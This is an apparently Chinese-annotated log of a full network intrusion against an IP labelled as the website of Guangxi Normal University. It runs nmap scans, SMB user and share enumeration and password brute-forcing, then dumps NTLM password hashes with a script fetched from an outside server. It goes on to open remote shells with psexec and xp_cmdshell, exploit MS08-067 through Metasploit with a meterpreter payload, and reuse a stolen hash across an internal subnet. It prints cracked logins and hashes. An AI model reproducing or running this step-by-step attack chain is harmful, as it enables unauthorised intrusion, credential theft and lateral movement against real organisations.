广西师范网站 http://202.103.242.241/
root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
3372/tcp open msdtc?
3389/tcp open ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root 1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
//此乃使用脚本扫描远程机器所存在的账户名

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser //扫描结果

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
//查看共享

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
| ADMIN$
| Anonymous access: <none>
| C$
| Anonymous access: <none>
| IPC$
|_ Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
//获取用户密码

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
| administrator:<blank> => Login was successful
|_ test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2 //抓hash
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe //获取一个cmdshell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' " //远程登录sa执行命令
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_ MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
//利用用户名跟获取的hash尝试对整段内网进行登录

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_ administrator:<blank> => Login was successful
攻击成功，一个简单的 msf + nmap 攻击~~